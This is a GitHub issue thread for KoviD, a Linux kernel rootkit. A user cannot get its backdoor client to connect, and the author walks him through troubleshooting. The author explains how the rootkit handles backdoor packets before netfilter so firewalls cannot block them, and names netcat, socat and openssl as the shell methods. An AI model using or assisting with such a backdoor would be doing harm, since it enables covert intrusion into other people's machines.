carloslack / KoviD

Linux kernel rootkit

Can't get the rootkit to work! #39

Closed mmuncan1980 closed 1 year ago

mmuncan1980 commented 1 year ago

I tried several OSes (CentOS 7, Ubuntu 20 and 18 and Kali) and every time I try to connect with bdclient it gives me the following back:

root@kali:/home/xxx/Downloads/KoviD/scripts# V=3 ./bdclient.sh openssl x.x.x.x 443
Using default temp DH parameters
ACCEPT

Starting Nping 0.7.93 ( https://nmap.org/nping ) at 2023-01-07 12:40 CET
SENT (0.0450s) TCP x.x.x.x:443 > 210.119.103.61:443 RPA ttl=64 id=46607 iplen=40 seq=2045339016 win=1480

Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A
Raw packets sent: 1 (40B) | Rcvd: 0 (0B) | Lost: 1 (100.00%)
Nping done: 1 IP address pinged in 1.08 seconds

What do I have to change to get it to work?

P.S.: there is no firewall between the 2 servers!

carloslack commented 1 year ago

Hi @mmuncan1980, as a general rule, when first running KoviD I advise that you open another terminal in the target machine (the one running KoviD) with dmesg -w and keep an eye on the log. If, when running bdclient.sh, you see in the log something like

Waiting for event
Got event

then it means that communication between the backdoor and the client is OK; otherwise it is not hitting the target machine. As for a firewall, KoviD handles the backdoor packets before they are forwarded to netfilter, therefore a firewall attempting to block the ICMP packets the client backdoor sends will fail and the rootkit will see the packets anyway.

Another thing is that we have 3 main ways to connect: netcat, socat and openssl. For each of these methods the binary must be available in the target machine, I mean, openssl must be available, and the same is true for socat and netcat; otherwise it will fail to connect in a similar fashion to what you've seen: silently.

My suggestion is that you first install netcat in the target machine and try using that connection method, because it is the simplest and doesn't involve encryption.

PS: also notice that, as I state in the README, openssl is problematic on some platforms for reasons I don't know; there is an issue open related to that.

carloslack commented 1 year ago

Also, if/when you have logs, please share them so I can help you better. Cheers

mmuncan1980 commented 1 year ago

Hello and thanks for answering! :D

The binaries are available on the machine. I did what you wrote (dmesg -w) and nothing happens on the remote server. BUT! If I sniff the connection (on my side) with Wireshark, the packet goes out and reaches the target IP. Tried every protocol offered, no reaction. I believe it has something to do with my NAT. (Got some shitty router from Deutsche Telekom, just cheap ;-))

Must be.

But if I use a "native" Internet IPv4 address (from some VPS) it still doesn't connect, so the problem can't somehow derive from my NAT. I really want to check out what you wrote, coz I believe it is some good software you made... ;) Been a bit stuck the last hours... :-/

I think it's just a little error in my thinking and I did something wrong. (Though it is not too difficult to compile it and start it ;-))

carloslack commented 1 year ago

Please compile with make (so as to have logs), then insmod it and check the dmesg output for KoviD logs during startup, and send them to me if you can. Thanks

carloslack commented 1 year ago

Hi @mmuncan1980, any news?